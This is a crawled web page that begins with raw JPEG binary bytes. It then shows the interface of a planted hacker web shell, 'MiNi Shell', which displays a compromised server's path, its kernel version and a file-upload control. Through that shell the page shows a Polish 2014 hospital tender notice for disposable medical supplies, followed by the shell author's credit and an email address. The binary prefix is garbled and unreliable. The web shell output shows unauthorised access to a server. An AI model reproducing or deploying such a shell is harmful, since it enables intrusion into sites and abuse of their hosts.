JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141031/362150-N-2014.html

<p class="kh_header"><b>Piekary Śląskie: DOSTAWA SPRZĘTU MEDYCZNEGO  JEDNORAZOWEGO UŻYTKU</b><br>
<b>Numer ogłoszenia: 362150 - 2014; data zamieszczenia: 31.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Piekarskie Centrum Medyczne Sp. z o.o. , ul. Szpitalna 11, 41-940 Piekary Śląskie, woj. śląskie, tel. 32 39 38 100, faks 32 39 38 127.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej Sp. z o. o.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SPRZĘTU MEDYCZNEGO  JEDNORAZOWEGO UŻYTKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa  sprzętu medycznego jednorazowego użytku na potrzeby Piekarskiego Centrum Medycznego Sp. z o. o.
2. Szczegółowy wykaz sprzętu  z uwzględnieniem podziału na pakiety  zawiera Formularz cenowy - Załącznik nr 3 do SIWZ. 
3. Zaoferowany do przetargu  sprzęt będący wyrobem medycznym winien spełniać warunki dopuszczenia do obrotu i stosowania  określone w  ustawie  z dnia 20.05.2010 r. o wyrobach medycznych ( Dz. U. z 2010 r. Nr 107, poz. 679 ), a także odpowiadać wszystkim  wymaganiom stawianym przez Zamawiającego  w SIWZ.
4. Oferowany do przetargu sprzęt musi być zgodny z opisem przedstawionym w SIWZ  oraz spełniać wszystkie  wymagania postawione przez Zamawiającego.
5. Dostarczane sprzęty muszą być odpowiednio opakowany i oznakowany etykieta zawierającą nazwę wyrobu, firmy i adres wytwórcy oraz autoryzowanego przedstawiciela / dystrybutora/ importera; informacje niezbędne do identyfikacji wyrobu i zawartości opakowania; daty ważności, seria lub kod;  wyraz JAŁOWE, STERYLNE  jeżeli dotyczy; metoda sterylizacji, jeżeli dotyczy; znak CE z numerem jednostki notyfikowanej, jeżeli brała udział w ocenie zgodności..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.23-0, 33.14.13.10-6, 35.11.34.10-6, 33.14.16.10-9, 33.14.10.00-0, 33.14.16.40-8, 33.14.16.20-2, 33.14.16.42-2, 33.14.11.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 20.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)oświadczenie o spełnieniu przez oferowany sprzęt obowiązujących norm i przepisów, oraz  posiadaniu przez Wykonawcę  stosownych dopuszczeń do obrotu i użytkowania oraz zobowiązanie do ich dostarczenia na każde żądanie Zamawiającego  na każdym etapie postępowania ( badania ofert ) w wyznaczonym przez Zamawiającego terminie( Załącznik nr 1  do specyfikacji ), 
b)oświadczenie o posiadaniu  materiałów producenta potwierdzających cechy wymagane dla przedmiotu zamówienia i  gotowości ich udostępnienia   na każde żądanie Zamawiającego  na każdym etapie postępowania ( badania ofert ) w wyznaczonym przez Zamawiającego terminie ( Załącznika nr 1  do specyfikacji ),  
c)informacja wykonawcy, które z oferowanych sprzętów nie są wyrobami medycznymi i nie podlegają rygorom ustawy z dnia 20.05.2010 r. o wyrobach medycznych ( Załącznik do sporządzenia przez Wykonawcę - jeżeli dotyczy). Wykonawca winien  podać nr pakietu , pozycje  oraz nazwę sprzętu,
d) oświadczenie o posiadaniu raportu walidacji w zakresie wskazanym dla Pakietu nr 3  gotowości jego udostępnienia na każde żądanie Zamawiającego, na każdym etapie postępowania ( badania ofert ), w wyznaczonym przez Zamawiającego terminie ( Załącznika nr 1  do specyfikacji ).</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W trakcie obowiązywania umowy strony dopuszczają zmiany cen w przypadku:
1)zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,
2)zmiany ceny na korzystniejszą dla Zamawiającego w trakcie trwania umowy, bez konieczności starań ze strony Zamawiającego,
3)zmiany cen jednostkowych sprzętu objętego umową w przypadku zmiany wielkości opakowania przez producenta sprzętu z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową.
Strony dopuszczają również następujące zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie , której dokonano wyboru Wykonawcy :
1)zmiana wielkości opakowania sprzętu, w przypadku braku dostępności zadeklarowanej wielkości opakowania,
2)zmiana osób upoważnionych do kontaktowania się w sprawie umowy, o których mowa w § 4.
Strony dopuszczają również możliwość zmiany umowy w części dotyczącej producenta, nazwy handlowej, kodu dostarczonego przedmiotu zamówienia jeśli na skutek zaprzestania lub wstrzymania produkcji lub wycofania z obrotu, nie jest możliwe dostarczenie sprzętu określonego w ofercie pod warunkiem, iż nowy zaoferowany przez Wykonawcę sprzęt posiada parametry nie gorsze niż sprzęt wskazany w ofercie, a Zamawiający go zaakceptuje.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 41-940 Piekary Śląskie, ul. Szpitalna 11. Specyfikacja w wersji papierowej udostępniana odpłatnie na wniosek Wykonawcy. Cena 20 PLN za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2014 godzina 10:00, miejsce: Sekretariat Zamawiającego pod adresem 41-940 Piekary Śląskie, ul. Szpitalna 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet obejmuje:
1.Mankiet jednorazowy dostępny dla dorosłych w trzech rozmiarach opakowanie 100 sztuk-szt	100;
2.Łącznik do mankietu dla urządzeń jednoprzewodowych;opakowanie 10 szt-	op	2;
3.Łącznik do mankietu dla urządzeń dwuprzewodowych;opakowanie 10 szt-	op	1;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet obejmuje:
1.Strzykawka trzyczęściowa, bezpieczna z końcówką luer-lock, posiadająca mechanizm umożliwiający schowanie igły w cylindrze po użyciu oraz zabezpieczenie przed ponownym użyciem strzykawki ; czytelna i trwała czarna skala pomiarowa ; podwójne uszczelnienie tłoka ; nazwa własna na cylindrze ; jałowe, sterylizowane tlenkiem etylenu ; informacja o braku lateksu na opakowaniu jednostkowym ; pojemność 3 ml ; opakowanie 100 szt -	szt	8000;
2.Strzykawka trzyczęściowa, bezpieczna z końcówką luer-lock, posiadająca mechanizm umożliwiający schowanie igły w cylindrze po użyciu oraz zabezpieczenie przed ponownym użyciem strzykawki ; czytelna i trwała czarna skala pomiarowa ; podwójne uszczelnienie tłoka ; nazwa własna na cylindrze ; jałowe, sterylizowane tlenkiem etylenu ; informacja o braku lateksu na opakowaniu jednostkowym ; pojemność 5 ml ; opakowanie 100 szt-	szt	30000;
3.Strzykawka trzyczęściowa, bezpieczna z końcówką luer-lock, posiadająca mechanizm umożliwiający schowanie igły w cylindrze po użyciu oraz zabezpieczenie przed ponownym użyciem strzykawki ; czytelna i trwała czarna skala pomiarowa ; podwójne uszczelnienie tłoka ; nazwa własna na cylindrze ; jałowe, sterylizowane tlenkiem etylenu ; informacja o braku lateksu na opakowaniu jednostkowym ; pojemność 10 ml ; opakowanie 100 szt-	szt	20000;
4.Strzykawka trzyczęściowa, bezpieczna z końcówką luer-lock, posiadająca mechanizm umożliwiający schowanie igły w cylindrze po użyciu oraz zabezpieczenie przed ponownym użyciem strzykawki ;czytelna i trwała czarna skala pomiarowa ; podwójne uszczelnienie tłoka ; nazwa własna na cylindrze ; jałowe, sterylizowane tlenkiem etylenu ; informacja o braku lateksu na opakowaniu jednostkowym ; pojemność 20 ml ; opakowanie 50 szt-szt	29000;
5.Strzykawka trzyczęściowa TBC z wbudowaną igłą, posiadającą mechanizm umożliwiający schowanie igły
w cylindrze po użyciu oraz zabezpieczenie przed ponownym użyciem strzykawki ; czytelna i trwała czarna skala pomiarowa ; podwójne uszczelnienie tłoka ; nazwa własna na cylindrze ; jałowe, sterylizowane tlenkiem etylenu ; informacja o braku lateksu na opakowaniu jednostkowym ; pojemność 1 ml ; -	szt	400;
6.Strzykawka trzyczęściowa do podawania płynów i leków płynnych doustnie, ze specjalnie zaprojektowaną końcówką, z zatyczką, zapobiegającą utracie zawartości strzykawki po przygotowaniu ; cylinder strzykawki przeźroczysty z białym tłokiem ; pojemność 5 ml ; opakowanie 100 sztuk	-szt	300;
7.Strzykawka trzyczęściowa do podawania płynów i leków płynnych doustnie, ze specjalnie zaprojektowaną końcówką, z zatyczką, zapobiegającą utracie zawartości strzykawki po przygotowaniu ; cylinder strzykawki przeźroczysty z białym tłokiem ; pojemność 10 ml ; opakowanie 100 sztuk	-szt	200;
8.Strzykawka trzyczęściowa do podawania płynów i leków płynnych doustnie, ze specjalnie zaprojektowaną końcówką, z zatyczką, zapobiegającą utracie zawartości strzykawki po przygotowaniu ; cylinder strzykawki bursztynowy z białym tłokiem ; pojemność 5 ml ; opakowanie 100 sztuk	-szt	100;
9.Strzykawka trzyczęściowa do podawania płynów i leków płynnych doustnie, ze specjalnie zaprojektowaną końcówką, z zatyczką, zapobiegającą utracie zawartości strzykawki po przygotowaniu ; cylinder strzykawki bursztynowy z białym tłokiem ; pojemność 10 ml ; opakowanie 100 sztuk-	szt	100;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet obejmuje:
1.Maska ochronna z zaworem oddechowym, typu FFP2, dwupanelowa ; warstwa zewnętrzna i wewnętrzna wykonana z wodoodpornej włókniny polipropylenu ; obydwie warstwy połączone  w ultradźwiękowym procesie łączenia tkanin zapewniającym trwalsze i szybsze połączenie ; zawór oddechowy umożliwiający zmniejszenie oporów oddechowych, ułatwiający swobodne oddychanie, powleczony syntetyczną gumową membraną  oraz zewnętrzną warstwą polipropylenu ; filtracja jeszcze dokładniejsza dzięki specjalnie skonstruowanej włókninie w procesie melt-blown ; skuteczność filtracji 0,47% ( Chlorek sodu 95 l / min ) ; zawartość dwutlenku węgla w powietrzu wdychanym 0,34% ; oporność 0,43 mbar ( wdychane 30 l / min ) ; pakowane pojedynczo w folię	szt	30;
2.Maska ochronna z zaworem oddechowym, typu FFP3, dwupanelowa ; warstwa zewnętrzna i wewnętrzna wykonana z wodoodpornej włókniny polipropylenu ; obydwie warstwy połączone  w ultradźwiękowym procesie łączenia tkanin zapewniającym trwalsze i szybsze połączenie ; zawór oddechowy umożliwiający zmniejszenie oporów oddechowych, ułatwiający swobodne oddychanie, powleczony syntetyczną gumową membraną  oraz zewnętrzną warstwą polipropylenu ; filtracja jeszcze dokładniejsza dzięki specjalnie skonstruowanej włókninie w procesie melt-blown ; skuteczność filtracji 0,48% ( Chlorek sodu 95 l / min ) ; zawartość dwutlenku węgla w powietrzu wdychanym 0,34% ; oporność 0,46 mbar ( wdychane 30 l / min ) ; pakowane pojedynczo w folię	szt	30;
3.Serweta jałowa, dwuwarstwowa ( laminat + włóknina ),o gramaturze 56 g / m2, o wymiarach  75 x 90 cm
z przylepcem na dłuższym boku ; chłonność 350% szt	300;
4.Serweta jałowa, dwuwarstwowa ( laminat + włóknina ),o gramaturze 56 g / m2, o wymiarach 120 x 90 cm
z przylepcem na dłuższym boku ; chłonność 350%szt	500;
5.Worek na wymiociny wykonany z PCV klasy medycznej, przezroczysty, nie zawierający lateksu, o pojemności 1000 ml, z podziałką od 50 do 1000 ml ; wyposażony w zastawkę antyzwrotną uniemożliwiającą wydostawanie się zapachu i treści na zewnątrz	szt	250;
6.Zestaw do odsysania pola operacyjnego, standardowy, zawierający : całkowicie transparentną końcówkę Yankauer Ch 23 ( O 3,80 / 7,59 mm ; wew. / zew. ),z 4 otworami bocznymi oraz pojedynczym zagięciem krzywizny, bez kontroli odsysania ; drenu łączącegoCh 24 ( O 5,60 / 8,00 mm ; wew. / zew. ), o długości
210 cm, z zakończeniem typu lejek-lejek, ze specjalnymi przegubami ( sprężynami zgięciowymi ), oraz możliwością docięcia w oznaczonych miejscach łącznika i dopasowania do każdego typu ssaka ( do średnicy krućca od 8 mm do 18 mm ) ; sterylny ;opakowanie papierowo-foliowe	szt	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.16.20-2, 33.14.16.10-9, 35.11.34.10-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet obejmuje:
1.Półautomatyczna, jednorazowa, igła do biopsji tkanek miękkich z regulowaną długością cięcia ; lekka, kompaktowa, z mocnym mechanizmem sprężynowym ; precyzyjna kontrola głębokości nakłucia możliwa dzięki dokładnej skali na igle ; dystalny koniec igły widoczny w ultradźwiękach ; loża mandrynu nie może powodować uszkodzeń pobranej tkanki ; igła musi posiadać wzmocnienia zapobiegające zaginaniu ; długość cięcia regulowana (15 lub 22 mm) ; możliwość pracy jedną ręką ; rozmiar : 14G, długość 100 mm ; rozmiar kodowany za pomocą kolorów szt	120;
2.Zestaw biernego i czynnego drenażu klatki piersiowej
z wyeliminowaną przestrzenią martwą ; komora kolekcyjna o pojemności 1000 ml, z podziałką co 10 ml oraz wydzieloną podziałką dla precyzyjnego pomiaru małych objętości, z zaworem spustowym z możliwością opróżnienia zawartości do worka ; płynna mechaniczna regulacja siły ssania w zakresie od 0 do 45 cm H2O ; optyczny, wyskalowany, wskaźnik membranowy informujący o faktycznej sile ssania ; sucha mechaniczna zastawka jednokierunkowa o stałym oporze ; wydzielona komora z siedmiostopniową skalą do oceny wielkości przecieku doopłucnowego ; automatyczne odbarczanie wysokiego ujemnego podciśnienia w opłucnej ; podwójny zawór odbarczający, zabezpieczający przed wzrostem ciśnienia w drenowanych komorach w kierunku dodatnim ; kontrolka sygnalizująca rozprężenie płuc ; bezigłowy port do pobierania próbek ; możliwość pracy w pozycji pionowej oraz poziomej ( istotne podczas transportu ) ; zintegrowany wieszak do zawieszenia na ramie łóżka oraz chwytak do transportu, a także zaczep mocujący do ubrania pacjenta ; zestaw sterylny, jednorazowego użytku ; opcjonalny pasek do przewieszania zestawu przez ramię pacjenta	szt	10;
3.Worek do drenażu, o pojemności 1000 ml, posiadający zintegrowany łącznik bagnetowy, kompatybilny do zaworu spustowego powyższego zestawu do biernego i czynnego drenażu klatki piersiowej 	szt	10,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.42-2, 33.14.16.20-2, 33.14.13.23-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet obejmuje:
1.Ambulatoryjny zestaw do drenażu opłucnej zawierający : worek 1500 ml (max 1700 ml), wyskalowany co 100 ml,z płatkową zastawką Heimlicha i odpowietrznikiem, ze zintegrowanym drenem łączącym z elastyczną prowadnicą do ukształtowania wykonaną z plastycznej stali nierdzewnej pokrytej polietylenem ze znacznikiem potwierdzającym jej właściwe położenie w drenie ; dren do klatki piersiowej wykonany z termoplastycznego PCV ze znacznikami głębokości, niebieską linią widoczną w RTG, 20 ml strzykawkę z zakończeniem typu Luer Lock, skalpel nr 10, zestaw szwów nr 0 (długość 1 m), sterylną mocną folię umożliwiającą użycie w warunkach pozaszpitalnych ; sterylny ; podwójnie pakowany ;rozmiar : 28F, 32F 	szt	30;
2.Dren do drenażu klatki piersiowej z trokarem typu trójgraniec, jednorazowego użytku, wykonany z bardzo miękkiego termoplastycznego PCV ; linią RTG na całej długości ; atraumatyczny otwór końcowy z 2 otworami bocznymi ; znaczniki głębokości co 2 cm ; zintegrowany uniwersalny łącznik do podłączenia z zestawem do drenażu ; oznaczenie rozmiaru na drenie i płaskim uchwycie trokara ; sterylny ; podwójnie pakowany
z zabezpieczeniem przed uszkodzeniem opakowania przez trokar ; rozmiar : 28F, 32F	szt	30;
3.Zestaw do punkcji opłucnej, jednorazowego użytku, zawierający : 3 igły, kranik trójdrożny, worek 2000 ml, strzykawka 50 - 60 ml ; sterylny ; opakowanie papierowo-foliowe	szt	90;
4.Zestaw do drenażu po usunięciu tarczycy zawierający :  2 dreny Ulmera, łącznik umożliwiający podłączenie jednego lub dwóch drenów, mieszek pojemności 100 ml ; sterylny ; opakowanie papierowo-folioweszt	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8, 33.14.16.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com